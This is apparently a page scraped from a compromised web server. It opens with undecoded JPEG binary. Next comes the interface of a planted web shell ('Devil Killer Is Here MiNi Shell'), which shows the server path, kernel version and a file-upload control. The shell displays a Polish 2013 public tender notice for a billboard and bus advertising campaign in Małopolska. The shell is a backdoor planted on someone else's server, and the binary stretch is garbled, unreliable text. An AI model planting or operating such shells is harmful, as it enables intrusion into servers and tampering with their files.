JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302296-N-2013.html

<p class="kh_header"><b>Kraków: Realizacja outdoorowej kampanii promocyjnej projektu Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 302296 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Małopolskie , ul. Basztowa 22, 31-156 Kraków, woj. małopolskie, tel. 012 4300394, 6303408,6303122, faks 012 6160144,6303126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja outdoorowej kampanii promocyjnej projektu Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja outdoorowej kampanii promocyjnej projektu Modernizacja kształcenia zawodowego w Małopolsce. 
2. Zamówienie składa się z dwóch części:
a) Część 1 obejmuje realizację billboardowej kampanii projektu, polegającej na ekspozycji reklamy projektu na 40 nośnikach typu citylight w Krakowie oraz na 18 nośnikach typu billboard, w miastach Województwa Małopolskiego, w terminie od 1 do 30 września 2013r.
b) Część 2 obejmuje realizację tranzytowej kampanii projektu, polegającej na oklejeniu i ekspozycji reklamy projektu na autobusach komunikacji miejskiej w Krakowie, Tarnowie, Chrzanowie, Oświęcimiu, Nowym Sączu, Nowym Targu, Gorlicach, w terminie od 1 września do 30 listopada 2013r.
3. Warunki wykonania zamówienia:
1) W ramach realizacji części 1 zamówienia, Wykonawca zobowiązany jest do: 
a) opracowania i przedstawienia do akceptacji Zamawiającego projektu graficznego projektu reklamy, uwzględniającego system identyfikacji wizualnej Zamawiającego oraz Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, 
b) uwzględniania  uwag i sugestii Zamawiającego przy opracowywaniu  projektu graficznego reklamy, oraz dostosowania go do wielkości nośników na których będzie eksponowany,
c) przekazania Zamawiającemu projektu graficznego reklamy dla wszystkich zastosowanych, podczas kampanii, rozmiarów nośników w formatach plików, umożliwiających pracę w programach Adobe Photoshop lub Corel Draw, np: .jpg, .tiff, .psd lub.cdr,
d) druku, wyklejenia oraz ekspozycji 40 sztuk reklamy typu citylight (o wymiarach 1,20 × 1,80), na nośnikach zlokalizowanych w Krakowie, w pobliżu szkół zawodowych i w centrum miasta, w miejscach o największym natężeniu ruchu pieszych, w tym opracowania i przedstawienia do akceptacji Zamawiającego planu lokalizacji nośników reklamowych typu citylight, na których realizowana będzie usługa reklamowa, z dokładnymi danymi topograficznymi (m.in. nazwą ulicy, położeniem przy ulicy itp.),
e) druku, wyklejenia oraz ekspozycji po jednym nośniku reklamowym typu billboard (o powierzchni nie mniejszej niż 12 m2) w 18 miastach województwa: Miechowie, Olkuszu, Nowym Targu, Gorlicach, Proszowicach, Dąbrowie Tarnowskiej, Brzesku, Bochni, Suchej Beskidzkiej, Myślenicach, Limanowej, Zakopanem, Chrzanowie, Oświęcimiu, Wadowicach, Wieliczce, Tarnowie, Nowym Sączu, w tym do opracowania i przedstawienia do akceptacji Zamawiającego planu lokalizacji nośników reklamowych typu billboard, przy czym nośniki powinny znajdować się w centrum poszczególnych miast lub przy drogach głównych w odległości nie większej niż 5 km od granic miasta,
f) realizacji miesięcznej kampanii na 18 nośnikach reklamowych typu billboard oraz 40 nośnikach reklamowych typu citylight, w dniach 1-30 września 2013 r., 
g) wykonania reklamy z materiałów trwałych i odpornych na warunki atmosferyczne, 
w sposób umożliwiający realizację kampanii bez usterek i uszkodzeń typu: niedodruk, niewyraźny druk, zaplamienia, odchodzenie/odrywanie materiału, z którego wykonana będzie reklama, od nośnika,
h) wykonania i przekazania do dnia 30 września 2013r. raportu fotograficznego z realizacji kampanii. 
2) W ramach realizacji części 2 zamówienia, Wykonawca zobowiązany jest do: 
a) opracowania i przedstawienia do akceptacji Zamawiającego projektu graficznego projektu reklamy, uwzględniającego system identyfikacji wizualnej Zamawiającego oraz Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, 
b) uwzględniania  uwag i sugestii Zamawiającego przy opracowywaniu  projektu graficznego reklamy, oraz dostosowania go do wielkości poszczególnych nośników na których będzie eksponowany,
c) przedstawienia do akceptacji Zamawiającego modele/typy autobusów, na których będzie realizowana kampania w poszczególnych miastach z zastrzeżeniem, że w Krakowie będzie to autobus przegubowy,
d) przekazania Zamawiającemu projektów graficznych reklamy dla wszystkich zastosowanych, podczas kampanii rodzajów/modeli nośników/autobusów, w formatach plików, umożliwiających pracę w programach Adobe Photoshop lub Corel Draw, np: .jpg, .tiff, .psd lub.cdr,
e) druku i wyklejenia reklamy całopojazdowej na autobusach komunikacji miejskiej w Krakowie (autobus przegubowy), Tarnowie, Chrzanowie, Oświęcimiu, Nowym Sączu, Nowym Targu, Gorlicach, z zajęciem szyb, możliwych do oklejenia, według standardów bezpieczeństwa przewoźnika, 
f) realizacji trzymiesięcznej kampanii na autobusach, w terminie od 1 września do 30 listopada 2013r.,
g) wykonania reklamy z materiałów trwałych i odpornych na warunki atmosferyczne, w sposób umożliwiający realizację kampanii bez usterek i uszkodzeń typu: niedodruk, niewyraźny druk, zaplamienia, odchodzenie/odrywanie materiału, z którego wykonana będzie reklama, od nośnika,
h) wykonania i przekazania do dnia 30 listopada 2013r. raportu fotograficznego z realizacji kampanii.
4. Wiekość zamówienia: dla części 1 - 35000,00 zł netto, dla części 2 - 105000,00 zł netto.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających. Zamówienia uzupełniające będą polegały na powtórzeniu tego samego rodzaju usług co zamówienie podstawowe. Wielkość lub zakres zamówień uzupełniających: nie więcej niż 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy.
2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
a) warunek udziału w postępowaniu, o którym mowa w art. 22 ust 1 pkt 2 zostanie uznany za spełniony, gdy Wykonawca wykaże się doświadczeniem w należytym wykonaniu (lub w wykonywaniu - w przypadku świadczeń okresowych lub ciągłych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi, odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Za usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia uważa się:
dla części 1 zamówienia: usługę polegającą na realizacji kampanii na nośnikach reklamowych typu: plakat, billboard, citylight, siatka wielkoformatowa itp. o wartości usługi co najmniej 10 000,00 złotych brutto,
dla części 2 zamówienia: usługę polegającą na realizacji kampanii tranzytowej na mobilnych nośnikach reklamowych typu samochód, bus, autobus, tramwaj itp. o wartości usługi co najmniej 10 000,00 złotych brutto. 
3. Wykonawcy ubiegający się o udzielenie zamówienia nie mogą podlegać wykluczeniu na podstawie art. 24 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi wymagań określonych przez Zamawiającego</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności poprzez przedstawienie pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji tych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
2. Dokumenty potwierdzające, że wykonawca będzie dysponował zasobami innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy, w stopniu niezbędnym dla należytego wykonania zamówienia oraz umożliwiającym ocenę, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, winny  w szczególności zawierać informacje dotyczące: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
3. W przypadku, gdy wykonawcę reprezentuje Pełnomocnik wraz z ofertą winno być złożone pełnomocnictwo dla tej osoby określające jego zakres. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia  następujących okoliczności: 
1) dla części 1 zamówienia:
a) w przypadku wykazania przez Wykonawcę braku wolnych nośników typu billboard, z przyczyn niezależnych od Wykonawcy, Zamawiający dopuszcza możliwość zmiany:
- max. 10 nośników typu billboard na tzw. przyczepę reklamową o powierzchni nie mniejszej niż 12m2 , 
- max. 10 nośników typu citylight na billboard,
b) w przypadku opóźnień wynikłych po stronie Zamawiającego, Zamawiający dopuszcza możliwość zmiany terminu realizacji kampanii, wówczas Zamawiający i Wykonawca wspólnie ustalą nowy termin kampanii, przy czym realizacja kampanii nie może przekroczyć dnia 31 października 2013r.
Zamawiający zastrzega, iż w przypadku zmiany terminu realizacji kampanii billboardowej, okres trwania kampanii nie ulegnie skróceniu oraz wartość wynagrodzenia nie ulegnie zmianie.
2) dla części 2 zamówienia:
a) w przypadku opóźnień wynikłych po stronie Zamawiającego, Zamawiający dopuszcza możliwość zmiany terminu realizacji kampanii tranzytowej, wówczas Zamawiający i Wykonawca wspólnie ustalą nowy termin kampanii, przy czym realizacja kampanii nie może przekroczyć dnia 15 grudnia 2013r. Zamawiający zastrzega, iż w przypadku zmiany terminu realizacji kampanii tranzytowej, okres trwania kampanii nie ulegnie skróceniu oraz wartość wynagrodzenia nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/bip/um<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Małopolskiego, ul. Racławicka 56, 30-017 Kraków, pok. 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2013 godzina 13:00, miejsce: Urząd Marszałkowski Województwa Małopolskiego, Dziennik podawczy, 30-017 Kraków, ul. Racławicka 56..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy pkt II.2, Zamówienie, należy wykonać w terminie:
- dla części 1 zamówienia: od dnia 01 września 2013 r. do dnia 30 września 2013 r. 
- dla części 2 zamówienia: od dnia 01 września 2013 r. do dnia 30 listopada 2013 r.
2. Projekt Modernizacja Kształcenia Zawodowego w Małopolsce jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Projekt systemowy Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Działanie 9.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizację billboardowej kampanii projektu, polegającej na ekspozycji reklamy projektu na 40 nośnikach typu citylight w Krakowie oraz na 18 nośnikach typu billboard, w miastach Województwa Małopolskiego, w terminie od 1 do 30 września 2013r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warunki wykonania zamówienia:
1. W ramach realizacji części 1 zamówienia, Wykonawca zobowiązany jest do: 
a) opracowania i przedstawienia do akceptacji Zamawiającego projektu graficznego projektu reklamy, uwzględniającego system identyfikacji wizualnej Zamawiającego oraz Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, 
b) uwzględniania  uwag i sugestii Zamawiającego przy opracowywaniu  projektu graficznego reklamy, oraz dostosowania go do wielkości nośników na których będzie eksponowany,
c) przekazania Zamawiającemu projektu graficznego reklamy dla wszystkich zastosowanych, podczas kampanii, rozmiarów nośników w formatach plików, umożliwiających pracę w programach Adobe Photoshop lub Corel Draw, np: .jpg, .tiff, .psd lub.cdr,
d) druku, wyklejenia oraz ekspozycji 40 sztuk reklamy typu citylight (o wymiarach 1,20 × 1,80), na nośnikach zlokalizowanych w Krakowie, w pobliżu szkół zawodowych i w centrum miasta, w miejscach o największym natężeniu ruchu pieszych, w tym opracowania i przedstawienia do akceptacji Zamawiającego planu lokalizacji nośników reklamowych typu citylight, na których realizowana będzie usługa reklamowa, z dokładnymi danymi topograficznymi (m.in. nazwą ulicy, położeniem przy ulicy itp.),
e) druku, wyklejenia oraz ekspozycji po jednym nośniku reklamowym typu billboard (o powierzchni nie mniejszej niż 12 m2) w 18 miastach województwa: Miechowie, Olkuszu, Nowym Targu, Gorlicach, Proszowicach, Dąbrowie Tarnowskiej, Brzesku, Bochni, Suchej Beskidzkiej, Myślenicach, Limanowej, Zakopanem, Chrzanowie, Oświęcimiu, Wadowicach, Wieliczce, Tarnowie, Nowym Sączu, w tym do opracowania i przedstawienia do akceptacji Zamawiającego planu lokalizacji nośników reklamowych typu billboard, przy czym nośniki powinny znajdować się w centrum poszczególnych miast lub przy drogach głównych w odległości nie większej niż 5 km od granic miasta,
f) realizacji miesięcznej kampanii na 18 nośnikach reklamowych typu billboard oraz 40 nośnikach reklamowych typu citylight, w dniach 1-30 września 2013 r., 
g) wykonania reklamy z materiałów trwałych i odpornych na warunki atmosferyczne, 
w sposób umożliwiający realizację kampanii bez usterek i uszkodzeń typu: niedodruk, niewyraźny druk, zaplamienia, odchodzenie/odrywanie materiału, z którego wykonana będzie reklama, od nośnika,
h) wykonania i przekazania do dnia 30 września 2013r. raportu fotograficznego z realizacji kampanii.
2. Wielkość zamówienia: 35000,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja tranzytowej kampanii projektu, polegającej na oklejeniu i ekspozycji reklamy projektu na autobusach komunikacji miejskiej w Krakowie, Tarnowie, Chrzanowie, Oświęcimiu, Nowym Sączu, Nowym Targu, Gorlicach, w terminie od 1 września do 30 listopada 2013r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warunki wykonania zamówienia:
1. W ramach realizacji części 2 zamówienia, Wykonawca zobowiązany jest do: 
a) opracowania i przedstawienia do akceptacji Zamawiającego projektu graficznego projektu reklamy, uwzględniającego system identyfikacji wizualnej Zamawiającego oraz Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, 
b) uwzględniania  uwag i sugestii Zamawiającego przy opracowywaniu  projektu graficznego reklamy, oraz dostosowania go do wielkości poszczególnych nośników na których będzie eksponowany,
c) przedstawienia do akceptacji Zamawiającego modele/typy autobusów, na których będzie realizowana kampania w poszczególnych miastach z zastrzeżeniem, że w Krakowie będzie to autobus przegubowy,
d) przekazania Zamawiającemu projektów graficznych reklamy dla wszystkich zastosowanych, podczas kampanii rodzajów/modeli nośników/autobusów, w formatach plików, umożliwiających pracę w programach Adobe Photoshop lub Corel Draw, np: .jpg, .tiff, .psd lub.cdr,
e) druku i wyklejenia reklamy całopojazdowej na autobusach komunikacji miejskiej w Krakowie (autobus przegubowy), Tarnowie, Chrzanowie, Oświęcimiu, Nowym Sączu, Nowym Targu, Gorlicach, z zajęciem szyb, możliwych do oklejenia, według standardów bezpieczeństwa przewoźnika, 
f) realizacji trzymiesięcznej kampanii na autobusach, w terminie od 1 września do 30 listopada 2013r.,
g) wykonania reklamy z materiałów trwałych i odpornych na warunki atmosferyczne, 
